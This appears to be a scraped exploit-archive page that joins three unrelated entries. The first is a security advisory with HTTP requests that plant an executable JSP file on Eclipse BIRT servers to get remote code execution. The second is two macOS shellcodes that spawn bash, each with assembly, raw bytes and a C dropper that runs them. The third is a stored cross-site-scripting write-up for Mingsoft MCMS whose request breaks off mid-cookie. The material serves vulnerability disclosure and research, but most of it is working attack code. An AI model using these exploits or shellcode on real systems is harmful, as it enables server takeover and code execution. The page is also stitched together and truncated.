Eclipse Business Intelligence Reporting Tool versions 4.11.0 and below suffer from a bypass vulnerability that allows for remote code execution.

SEC Consult Vulnerability Lab Security Advisory < 20221216-0 >  
=======================================================================  
               title: Remote code execution - CVE-2021-34427 bypass  
             product: Eclipse Business Intelligence Reporting Tool (BiRT)  
  vulnerable version: <= 4.11.0  
       fixed version: 4.12  
          CVE number: CVE-2021-34427  
              impact: High  
            homepage: https://eclipse.github.io/birt-website/  
               found: 2022-10-05  
                  by: Armin Stock (Atos)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"With BIRT you can create data visualizations, dashboards and reports  
that can be embedded into web applications and rich clients. Make information out  
of your data!"

https://eclipse.github.io/birt-website/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Remote code execution - CVE-2021-34427 bypass  
The vulnerability described in CVE-2021-34427 (https://www.cvedetails.com/cve/CVE-2021-34427/)  
allows an attacker to execute code on the server, by creating a `.jsp` file  
with the `BiRT - WebViewerExample`. This was fixed with the following code:

-------------------------------------------------------------------------------  
// viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081  
  protected static void checkExtensionAllowedForRPTDocument(String rptDocumentName) throws ViewerException {  
    int extIndex = rptDocumentName.lastIndexOf(".");  
    String extension = null;  
    boolean validExtension = true;

    if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length()) {  
      extension = rptDocumentName.substring(extIndex + 1);

      if (!disallowedExtensionsForRptDocument.isEmpty()  
          && disallowedExtensionsForRptDocument.contains(extension)) {  
        validExtension = false;  
      }

      if (!allowedExtensionsForRptDocument.isEmpty() && !allowedExtensionsForRptDocument.contains(extension)) {  
        validExtension = false;  
      }

      if (!validExtension) {  
        throw new ViewerException(BirtResources.getMessage(  
            ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[] { extension }));  
      }

    }  
  }  
-------------------------------------------------------------------------------

This fix can be easily bypassed by adding `/.` to the filename which allows  
an attacker to execute arbitrary code.

Proof of concept:  
-----------------  
1) Remote code execution - CVE-2021-34427 bypass  
The old exploit results in an error message:

-------------------------------------------------------------------------------  
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " +   
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode> HTTP/1.1  
Host: IP:18080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A  
Upgrade-Insecure-Requests: 1  
-------------------------------------------------------------------------------

Response:  
-------------------------------------------------------------------------------  
HTTP/1.1 200  
Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly  
Content-Type: text/html;charset=utf-8  
Date: Wed, 05 Oct 2022 06:14:54 GMT  
Connection: close  
Content-Length: 4644

<html>  
<head>  
<title>Error</title>  
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>  
</head>  
<body>  
<div id="birt_errorPage" style="color:red">  
<span id="error_icon"  style="cursor:pointer" onclick="if (document.getElementById('error_detail').style.display == 'none') { document.getElementById('error_icon').innerHTML = '- ';   
document.getElementById('error_detail').style.display = 'block'; }else { document.getElementById('error_icon').innerHTML = '+ '; document.getElementById('error_detail').style.display = 'none'; }" > +   
</span>

Invalid extension - "jsp" for the __document parameter.  
-------------------------------------------------------------------------------

But adding `/.` to the end of the filename creates the file on the server as  
before:

-------------------------------------------------------------------------------  
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " +   
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp/.<@/urlencode> HTTP/1.1  
Host: IP:18080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A  
Upgrade-Insecure-Requests: 1

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------  
HTTP/1.1 200  
Set-Cookie: JSESSIONID=5CC070E6E07D94816BF67A162E7DD8D2; Path=/birt; HttpOnly  
Content-Type: text/html;charset=utf-8  
Date: Wed, 05 Oct 2022 05:26:01 GMT  
Connection: close  
Content-Length: 283

<html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head>  
<body style="background-color: #ECE9D8;">  
<div style="font-size:10pt;"><font color="black">  
The report document file has been generated successfully.</font>  
</div></body></html>  
-------------------------------------------------------------------------------

This allows the execution of the provided `JSP` code, by calling  
`/birt/test/info-new.jsp`.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested, but all versions <= 4.11 are vulnerable.  
* 4.10.0 (2022-10-01)

Vendor contact timeline:  
------------------------  
2022-11-07: Vendor contacted via bugs.eclipse.org (https://bugs.eclipse.org/bugs/show_bug.cgi?id=580994)  
2022-11-17: Vendor confirmed the bypass and is working on a fix.  
2022-11-17: Vendor provided a fix.  
2022-11-27: The fix was tested and could be bypassed again.  
2022-11-27: Vendor acknowledged the bypass and provided a new fix.  
2022-11-28: The fix was tested and we were not able to bypass it.  
2022-11-30: Vendor releases patched version 4.12  
2022-12-16: Public release of security advisory.

Solution:  
---------  
Update Eclipse BIRT to version 4.12 or newer from the vendor's website:  
https://projects.eclipse.org/projects/technology.birt/releases/4.12.0

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Armin Stock / @2022

Eclipse Business Intelligence Reporting Tool 4.11.0 Remote Code Execution

286 bytes small macOS/x64 execve Caesar cipher string null-free shellcode.

    # Shellcode Title: macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode (286 Bytes)# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7# Date: 12/20/2022# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64# Shellcode Description:# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is ceasar cipher crypted with the increment key of 7 within the shellcode. The shellcode finds the string in memory, copies the string to the stack, deciphers the string, and then changes the string terminator to 0x00.# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course! # Compile & run:#     nasm -f macho64 execve.asm -o execve#     for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo#  # Add shellcode to dropper.c#     gcc dropper.c -o dropper#     sh-3.2$ pstree -p $(echo $$) | grep $$#       \-+= 28533 bobby sh#     sh-3.2$ ./dropper #       [+] testcode Length: 286 Bytes#       [+] Copying testcode from variable at 0x10aeeade0 to allocated RWX memory at 0x10b030000#       [+] Executing testcode at 0x10b030000#     bobby$ pstree -p $(echo $$) | grep -B1 $$#       \-+= 28533 bobby sh#         \-+= 28584 bobby (bash)bits 64global _main_main:  create_stackframe:    push rbp           ; push current base pointer to the stack    mov rbp, rsp       ; Set Base Stack Pointer for new Stack-Frame    sub rsp, 0x60      ; create space for string    mov [rbp-0x8], rsp ; Save destination string buffer address    jmp short lilypad_1; char * string eggHunter(egg);;     RAX                 RDIa; description: starts searching for the supplied egg starting from the callers return addresseggHunter:  mov rcx, [rsp]    ; start the egghunter from the caller function return address  hunt:    inc rcx         ; move to the hunter to the next byte    cmp [rcx], di   ; did we find the first  egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; move hunter to 2nd egg location    cmp [rcx], di   ; did we find the second egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; both eggs found! Move hunter +2 to return the start of buffer addr    xchg rax, rcx   ; return start of string address    ret; int length strsize(&string, terminator);;      RAX              RDI        RSI; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.strsize:  xor rax, rax      ; clear register  xor rcx, rcx      ; set the counter to zero  strsize_loop:    mov rcx, rdi    ; start of string address    add rcx, rax    ; current memory location of char in string    cmp [rcx], sil  ; is this the null terminator?    je strsize_return    prevent_infinite_loop:      cmp ax, 0x1001          ; compare value in RAX to 0x1001 (prevent infinite mem scanning)      jg strsize_fail2find    ; if value in RAX is greater, jump to label    inc rax                   ; move to the next char in the string    jmp strsize_loop  strsize_fail2find:    xor rax, rax    ; return null/ 0x0  strsize_return:    retlilypad_1:  jmp short lilypad_2; char * string terminateString(&string, terminator);;     RAX                          RDI        RSI; description: Finds the string terminator and changes it to a null byteterminateString:  xor rcx, rcx      ; set the counter to zero  mov rcx, rdi      ; start address to look for terminator  loop_find_terminator:    cmp [rcx], sil  ; is this the null terminator?    je found_terminator    inc rcx         ; move to the next char in the string    jmp loop_find_terminator  found_terminator:    mov [rcx], al    ret; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);;        RAX                         RDI             RSI              RDX; description: Move memory from source address to destination address;  ARG1 - RDI: destination address;  ARG2 - RSI: source address;  ARG3 - RDX: size of the memorymove_memory:  ; Loop through memory and move each byte from source to destination  push rdi                 ; save the destination address so we can return it at the end  xor rax, rax             ; register to temporarily hold the byte we are copying  move_memory_loop:    mov al, [rsi]          ; read the byte from source address into the temporary register    mov [rdi], al          ; write the byte at the destination address    inc rsi                ; increment source address    inc rdi                ; increment destination address    dec rdx                ; decrement memory size    jnz move_memory_loop   ; repeat loop until memory size is 0  ; Return to caller  pop rax                  ; return the destination address of the memory to the caller  retlilypad_2:  jmp short lilypad_3; void clear_memory(void *dst_addr, size_t mem_size);;                         RDI              RSI; description: Writes 0x00 bytes to a destination address;  ARG1 - RDI: a pointer to the destination address;  ARG2 - RSI: the size of the memory to be written toclear_memory:  mov rcx, rsi     ; load memory size from second argument into rcx  xor rax, rax  ; Loop through memory and write 0x00 to each byte in destination address  clrmem_loop:    mov byte [rdi], al   ; write 0x00 to byte in destination address    inc rdi              ; increment destination address    dec rcx              ; decrement memory size    jnz clrmem_loop      ; repeat loop until memory size is 0    ret ; Return to caller; void basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);;                                  RDI                        RSI                RDXbasicCaesar_Decrypt:  bcd_loop:    sub [rsi], dl  ;  Subtract the value of dl from the memory location pointed to by RSI    inc rsi        ;  Increment RSI to point to the next character    dec rdi        ;  Decrement stringLength counter    test rdi,rdi   ;  Test if stringLength counter is zero    jnz bcd_loop   ;  If stringLength counter is not zero, jump back to the beginning of the loop  ret ; Return to callerlilypad_3:  ; *string = eggHunter(egg); Starts hunt from return address of caller  find_execve_string:     xor rdi, rdi        ; clear register    mov  di, 0xBCB0     ; Arg 1: Our egg    call eggHunter      ; returns string start address    mov [rbp-0x10], rax ; Save string address  get_strlen:    mov rdi, [rbp-0x10]    ; Arg 1: string start address    xor rsi, rsi           ; clear register    mov sil, 0xFF          ; Arg 2: string terminator    call strsize ; returns string size    mov [rbp-0x18], rax    ; Save string size        ; move_memory(dst_addr, src_addr, mem_size);  ;               RDI       RSI       RDX  copy_str2stack:    mov rdi, [rbp-0x8]      ; Arg 1: String buffer on stack    mov rsi, [rbp-0x10]     ; Arg 2: Original string location    mov rdx, [rbp-0x18]     ; Arg 3: size    call move_memory  ; basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);  ;                             RDI                        RSI                RDX  do_caesar_cipher_decrypt:    mov rdi, [rbp-0x18]       ; Arg 1: string size    mov rsi, [rbp-0x8]        ; Arg 2: String buffer on stack    xor rdx, rdx              ; clear register    add dl, 0x7               ; Arg 3: Ceaser Chiper Key: 7    call basicCaesar_Decrypt  ; returns string size  do_terminate_string:    mov rdx, [rbp-0x18]     ; string size    mov rdi, [rbp-0x8]      ; String buffer on stack    add rdi, rdx            ; Arg 1: string terminator location    xor rsi, rsi            ; clear register    mov sil, 0x1            ; Arg 2: mem size to null    call clear_memory       ; returns string size  ; execve("/bin/bash",NULL,NULL)  execve:    mov  rdi, [rbp-0x8]  ; Arg 1: String buffer on stack      xor  rsi, rsi        ; Arg 2: NULL    xor  rdx, rdx        ; Arg 3: NULL    xor  rax, rax        ; clear register for syscall number setup    mov  al, 0x2         ; set a bit in register    ror  rax, 0x28       ; move the bit over 28 bits to the right in the register    mov  al, 0x3b        ; set the lower byte (AL) of the RAX register to the execve syscall number    syscall              ; do the syscall interrupt    fixstack:    add rsp, 0x60    ; clear allocated stack space    pop rbp          ; restore stack base pointer    ret              ; return to caller; ~~ Ceaser Chiper String Cryptor ~~; Original String:   /bin/bash; String Length:     9; Ceaser Chiper Key: 7; Chiper String:     6ipu6ihzo; unsigned char chiperString[] = {0x36,0x69,0x70,0x75,0x36,0x69,0x68,0x7a,0x6f};; unsigned char chiperString[] = "\x36\x69\x70\x75\x36\x69\x68\x7a\x6f";; Dechipered String: /bin/bashshell_path_string:  db  0xB0,0xBC,0xB0,0xBC,"6ipu6ihzo",0xFF###########################################################################################################################################// dropper.c#include <stdio.h>#include <sys/mman.h>#include <string.h>#include <stdlib.h>int (*execute_testcode)();const unsigned char testcode[] = "\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x1f\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x28\x16\x48\xff\xc6\x48\xff\xcf\x48\x85\xff\x75\xf3\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x6d\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x76\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\x96\xff\xff\xff\x48\x8b\x7d\xe8\x48\x8b\x75\xf8\x48\x31\xd2\x80\xc2\x07\xe8\xab\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\x84\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x36\x69\x70\x75\x36\x69\x68\x7a\x6f\xff";int main() {    size_t testcode_size = sizeof(testcode);    printf("[+] testcode Length: %lu Bytes\n", testcode_size);      void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);     if (rwx_memory == MAP_FAILED) {        printf("[!] Failed to allocate RWX memory\n");        perror("mmap");        exit(-1);    }     printf("[+] Copying testcode from variable at %p to allocated RWX memory at %p\n",testcode,rwx_memory);    memcpy(rwx_memory, testcode, sizeof(testcode));    execute_testcode = rwx_memory;     printf("[+] Executing testcode at %p\n",rwx_memory);    execute_testcode();    return 0;}

macOS/x64 Execve Caesar Cipher String Null-Free Shellcode 

253 bytes small macOS/x64 execve null-free shellcode.

    # Shellcode Title: macOS/x64 - Execve Null-Free Shellcode (253 Bytes)# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7# Date: 12/20/2022# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64# Shellcode Description:# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is within the shellcode. The shellcode finds the string in memory, copies the string to the stack, and then changes the string terminator to 0x00.# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course! # Compile & run:#     nasm -f macho64 execve.asm -o execve#     for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo#  # Add shellcode to dropper.c#     gcc dropper.c -o dropper#     sh-3.2$ pstree -p $(echo $$) | grep $$#           \-+= 56862 bobby sh#     sh-3.2$ ./dropper#         [+] Shellcode Length: 253 Bytes#         [+] Copying shellcode from variable at 0x10e4fde00 to allocated RWX memory at 0x10e643000#         [+] Executing shellcode at 0x10e643000#     bobby$ pstree -p $(echo $$) | grep -B1 $$#           \-+= 56862 bobby sh#             \-+= 57021 bobby (bash)bits 64global _main_main:  create_stackframe:    push rbp           ; push current base pointer to the stack    mov rbp, rsp       ; Set Base Stack Pointer for new Stack-Frame    sub rsp, 0x60      ; create space for string    mov [rbp-0x8], rsp ; Save destination string buffer address    jmp short lilypad_1; char * string eggHunter(egg);;     RAX                 RDI; description: starts searching for the supplied egg starting from the callers return addresseggHunter:  mov rcx, [rsp]    ; start the egghunter from the caller function return address  hunt:    inc rcx         ; move to the hunter to the next byte    cmp [rcx], di   ; did we find the first  egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; move hunter to 2nd egg location    cmp [rcx], di   ; did we find the second egg?    jne hunt        ; if not, continue hunt    add cx, 0x2     ; both eggs found! Move hunter +2 to return the start of buffer addr    xchg rax, rcx   ; return start of string address    ret; int length strsize(&string, terminator);;      RAX              RDI        RSI; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.strsize:  xor rax, rax      ; clear register  xor rcx, rcx      ; set the counter to zero  strsize_loop:    mov rcx, rdi    ; start of string address    add rcx, rax    ; current memory location of char in string    cmp [rcx], sil  ; is this the null terminator?    je strsize_return    prevent_infinite_loop:      cmp ax, 0x1001          ; compare value in RAX to 0x1001 (prevent infinite mem scanning)      jg strsize_fail2find    ; if value in RAX is greater, jump to label    inc rax                   ; move to the next char in the string    jmp strsize_loop  strsize_fail2find:    xor rax, rax    ; return null/ 0x0  strsize_return:    retlilypad_1:  jmp short lilypad_2; char * string terminateString(&string, terminator);;     RAX                          RDI        RSI; description: Finds the string terminator and changes it to a null byteterminateString:  xor rcx, rcx      ; set the counter to zero  mov rcx, rdi      ; start address to look for terminator  loop_find_terminator:    cmp [rcx], sil  ; is this the null terminator?    je found_terminator    inc rcx         ; move to the next char in the string    jmp loop_find_terminator  found_terminator:    mov [rcx], al    ret; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);;        RAX                         RDI             RSI              RDX; description: Move memory from source address to destination address;  ARG1 - RDI: destination address;  ARG2 - RSI: source address;  ARG3 - RDX: size of the memorymove_memory:  ; Loop through memory and move each byte from source to destination  push rdi                 ; save the destination address so we can return it at the end  xor rax, rax             ; register to temporarily hold the byte we are copying  move_memory_loop:    mov al, [rsi]          ; read the byte from source address into the temporary register    mov [rdi], al          ; write the byte at the destination address    inc rsi                ; increment source address    inc rdi                ; increment destination address    dec rdx                ; decrement memory size    jnz move_memory_loop   ; repeat loop until memory size is 0  ; Return to caller  pop rax                  ; return the destination address of the memory to the caller  retlilypad_2:  jmp short lilypad_3; void clear_memory(void *dst_addr, size_t mem_size);;                         RDI              RSI; description: Writes 0x00 bytes to a destination address;  ARG1 - RDI: a pointer to the destination address;  ARG2 - RSI: the size of the memory to be written toclear_memory:  mov rcx, rsi     ; load memory size from second argument into rcx  xor rax, rax  ; Loop through memory and write 0x00 to each byte in destination address  clrmem_loop:    mov byte [rdi], al   ; write 0x00 to byte in destination address    inc rdi              ; increment destination address    dec rcx              ; decrement memory size    jnz clrmem_loop      ; repeat loop until memory size is 0  ; Return to caller  retlilypad_3:  ; *string = eggHunter(egg); Starts hunt from return address of caller  find_execve_string:     xor rdi, rdi        ; clear register    mov  di, 0xBCB0     ; Arg 1: Our egg    call eggHunter      ; returns string start address    mov [rbp-0x10], rax ; Save string address  get_strlen:    mov rdi, [rbp-0x10]    ; Arg 1: string start address    xor rsi, rsi           ; clear register    mov sil, 0xFF          ; Arg 2: string terminator    call strsize ; returns string size    mov [rbp-0x18], rax    ; Save string size        ; move_memory(dst_addr, src_addr, mem_size);  ;               RDI       RSI       RDX  copy_str2stack:    mov rdi, [rbp-0x8]      ; Arg 1: String buffer on stack    mov rsi, [rbp-0x10]     ; Arg 2: Original string location    mov rdx, [rbp-0x18]     ; Arg 3: size    call move_memory  do_terminate_string:    mov rdx, [rbp-0x18]     ; string size    mov rdi, [rbp-0x8]      ; String buffer on stack    add rdi, rdx            ; Arg 1: string terminator location    xor rsi, rsi            ; clear register    mov sil, 0x1            ; Arg 2: mem size to null    call clear_memory       ; returns string size  ; execve("/bin/bash",NULL,NULL)  execve:    mov rdi, [rbp-0x8]  ; Arg 1: String buffer on stack      xor  rsi, rsi       ; Arg 2: NULL    xor  rdx, rdx       ; Arg 3: NULL    xor  rax, rax       ; clear register for syscall number setup    mov  al, 0x2        ; set a bit in register    ror  rax, 0x28      ; move the bit over 28 bits to the right in the register    mov  al, 0x3b       ; set the lower byte (AL) of the RAX register to the execve syscall number    syscall             ; do syscall interrupt    fixstack:    add rsp, 0x60    ; clear allocated stack space    pop rbp          ; restore stack base pointer    ret              ; return to callershell_path_string:  db  0xB0,0xBC,0xB0,0xBC,"/bin/bash",0xFF###########################################################################################################################################// dropper.c#include <stdio.h>#include <sys/mman.h>#include <string.h>#include <stdlib.h>int (*execute_shellcode)();const unsigned char shellcode[] = "\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x11\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x7b\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x84\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\xa4\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\xa5\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\xff";int main() {    size_t shellcode_size = sizeof(shellcode);    printf("[+] Shellcode Length: %lu Bytes\n", shellcode_size);      void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);     if (rwx_memory == MAP_FAILED) {        printf("[!] Failed to allocate RWX memory\n");        perror("mmap");        exit(-1);    }     printf("[+] Copying shellcode from variable at %p to allocated RWX memory at %p\n",shellcode,rwx_memory);    memcpy(rwx_memory, shellcode, sizeof(shellcode));    execute_shellcode = rwx_memory;     printf("[+] Executing shellcode at %p\n",rwx_memory);    execute_shellcode();    return 0; }

macOS/x64 Execve Null-Free Shellcode

A vulnerability has been found in Mingsoft MCMS 5.2.9 and classified as problematic. Affected by this vulnerability is the function save of the component Article Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216499.

**漏洞详情**

在保存或者更新文章的时候，没有对提交数据做严格的过滤。生成文章时，在前台照成xss攻击。

    net.mingsoft.cms.action#save()
    

    net.mingsoft.cms.action#update()
    

在net.mingsoft.cms.entity包下面都是类似JavaBean的写法，set()直接设置，get()获取返回直接返回，没有过滤。

构造payload

可以看到这几个字段都没经过有限过滤。

  
生成poc

生成时，会把上面payload直接输出到前台html。

可以看到其中 标题、描述、内容，直接输出到前台HTML。

可以看到contentTitle、contentDescription、contentDetails 三个构造的payload触发。

    POST /ms/cms/content/save.do HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Cache-Control: no-cache
    Pragma: no-cache
    token: null
    Content-Length: 491
    Origin: http://localhost:8080
    Connection: close
    Referer: http://localhost:8080/ms/cms/content/form.do
    Cookie: Phpstorm-f6f062b4=5f525093-5f84-4757-8d57-73a0807e485f; currentMenuCode=1599107821860655104; pageNo=2; pageSize=20; pageno_cookie=1; SHIRO_SESSION_ID=58a8d37d-8a16-430e-a7ef-925839f673e0; rememberMe=5cjEDUiKQ6EcshxFJv6JNis4+TagGWtfYnhBYTSNM7EP5KDqO2/eXptuk3yigpRYnLtx+I12zn8n+Gst9nIatcPOzKhtmhXsRFeVEZkhMnKk6/hwmvK6bikR3zS59ckqOCyxze4jmESJ8Kh8h50p1w9CchOCxhcH17GpRz29vlPFvdT1iKZHMHncxuhfDCfBj5mQOpwSHtGotKOJoQ+EJdnmcRvkdDRkP/woZ+xvAZTixkRHW1HWn3/nIjapKo5G5EmXeuN+1YmauoeMX9NXg1n4Q3XONqwS3EJC1PMqdLWIOxBjt9vEGC9OnsiUHlZDZnFwxFs9A0gELQUO0qy0/cudGdDamjgFTa4bLCQvJ0GjHCaigPj+PvQ2qPc+dfXuUzC9sYK9E1tv8QtsrEQXjuNoHsc7a0OMvTPSfKYntICLzNfhI8oDF6dZLuW/4pRUYTD9N650hVA/Aa9oDrLMCj10m52kTPrQ0u3yU6VsOSr4vY1D/Zkj7VsHfnN8teAwC0V0CzyDC+PJfIuccESmNSkI/7mtVNV9P45dY8eJZTP+GgAEOLcZB73BYRujlD50iqaeMxUJXQPOZkpE8rCrxZpKS+1sjgti9gbRYdbdiF4b78GNyzOZShCGMIdt06uuDcL4pGIq6iBSVk2v0hf65nbIFhl7Wfn3hZeg6/ETfTqUCYq8vW0TLK6WO7njF/083lb4Pz39Bx2Dejdx5IfQt5oLyxSoqLrDaB87Fuq+96yZz3Iw+VITpahW2UBinDGF25R85PbqKY8SacCQzqQaqHz4zKkPLtIvMEVYld7bMVL+vLU5FB7Da5Ti9ce+XAkUK6nEsWYpJq3ONi5+nzI1ZSIWfEuumIK6xGQ6qpyjPSo732xSfHT+1fpAhs+yTGlFpTk+iht43qK5upi2jcAZcxqy3mFjjbLXVAng7Bp0QbRH+aD+su8H/UEGiOEJ9b6in2zCN/caz6YNmNpjb1ubG3VBOYanpERZEaRuL/5Sl294YE6mBUPfn+CN0xjzJWCiC0KqBI1DCxb6D0u2mLdsXaCbhCv02VyVL3IlHScbE50MXz/ioisb0ccLTNzafP41YjO5bDz1laIsvTw1keROjcltAexzg